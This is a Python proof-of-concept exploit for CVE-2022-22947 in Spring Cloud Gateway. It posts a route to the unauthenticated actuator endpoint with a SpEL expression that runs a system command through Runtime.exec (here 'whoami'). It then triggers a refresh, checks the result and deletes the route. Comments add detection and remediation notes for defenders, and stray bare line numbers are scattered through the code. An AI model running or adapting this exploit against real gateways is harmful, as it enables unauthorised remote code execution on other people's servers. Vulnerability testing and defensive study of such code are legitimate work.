1 import requests
2 import argparse
3 import json
4
# Request headers shared by every call in this script.
# The User-Agent is a fixed desktop-browser string rather than the default
# python-requests one, so the User-Agent alone is not a reliable way to spot
# this traffic in gateway or proxy logs; the request paths under
# /actuator/gateway/ are the stable signal.
headers = {
    "Content-Type": "application/json",
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
    'Accept': '*/*',
}
8
def delete(url):
    """Send an HTTP DELETE for the route at *url* and report the outcome.

    *url* is the full route URL, as built by interview().

    The only evidence of success is a 200 status code. The function does not
    query the route again and does not call the refresh endpoint, so a 200
    here is not proof that the route is gone from the running gateway; check
    the route list on the host itself.
    """
    # verify=False turns off TLS certificate validation. No timeout is set,
    # so a server that never answers blocks this call indefinitely.
    reply = requests.delete(url=url, headers=headers, verify=False)
    message = (
        'Your malevolence route is deleted, take it easy~'
        if reply.status_code == 200
        else 'Please delete your malevolence route manually~'
    )
    print(message)
15
def interview(url):
    """Look up the test route on host *url* ("ip:port") and print a verdict.

    The verdict rests only on the status code of the route lookup. Neither the
    response body nor any response header is inspected, so:

    * 'It looks likely vulnerable' means the actuator returned the stored
      route without authentication. That exposure is itself the finding to
      remediate (patch the gateway, and disable or protect the gateway
      actuator endpoint, e.g. management.endpoint.gateway.enabled=false).
    * 'It is strong' means only that the lookup did not return 200; it is not
      evidence that the host is patched.
    """
    route_url = 'http://' + url + '/actuator/gateway/routes/wavesky'
    lookup = requests.get(url=route_url, headers=headers)
    if lookup.status_code != 200:
        # No cleanup is attempted on this path, so a route created earlier
        # may still be present on the host.
        print('It is strong')
        return
    print('It looks likely vulnerable')
    delete(route_url)
24
def trigger(url):
    """POST to the gateway refresh endpoint on *url*; on 200, run interview().

    The POST itself sits outside the try block, so connection errors from it
    propagate to the caller. Only errors raised while checking the status or
    inside interview() are caught and printed.
    """
    refresh_url = 'http://' + url + '/actuator/gateway/refresh'
    reply = requests.post(headers=headers, url=refresh_url, verify=False)
    try:
        if reply.status_code != 200:
            # Refresh refused: nothing further is done, and the route is not
            # cleaned up.
            return
        interview(url)
    except Exception as err:
        print(err)
35
def exploit(url):
    """Create the test route on host *url* ("ip:port"); on 201, call trigger().

    The route body carries an AddResponseHeader filter whose value is an
    expression-language string, which is the input the script's own
    description ties to CVE-2022-22947.

    Notes for defenders:

    * Unauthenticated POSTs to /actuator/gateway/routes/<id> followed by a
      POST to /actuator/gateway/refresh are the behaviour to alert on.
    * The route id 'wavesky' is a literal in this script and trivially
      changed, so it is a weak indicator. Matching on '#{' and 'T(' inside
      route filter arguments is more robust.
    * Remediation is to upgrade Spring Cloud Gateway to a fixed release and
      to disable or authenticate the gateway actuator endpoint.
    """
    route_url = 'http://' + url + '/actuator/gateway/routes/wavesky'
    # Kept exactly as published; the command inside it is a harmless identity
    # query.
    header_value = '#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}'
    response_filter = {
        'name': 'AddResponseHeader',
        'args': {'name': 'Result', 'value': header_value},
    }
    payload = {
        'id': 'wavesky',
        'filters': [response_filter],
        'uri': 'http://example.com',
    }
    body = json.dumps(payload)
    # This POST is outside the try block, so network errors from it are not
    # caught here.
    reply = requests.post(url=route_url, data=body, headers=headers, verify=False)
    try:
        if reply.status_code != 201:
            return
        trigger(url)
    except Exception as err:
        print(err)
51
if __name__ == '__main__':
    # Command-line entry point. --file is accepted by the parser but never
    # read anywhere in this listing; only --url ("ip:port") drives the run.
    cli = argparse.ArgumentParser(description='Poc CVE-2022-22947:')
    cli.add_argument('--file', help='url file', required=False)
    cli.add_argument('--url', help='ip:port', required=False)
    options = cli.parse_args()

    if not options.url:
        cli.print_help()
    else:
        exploit(options.url)
        exit()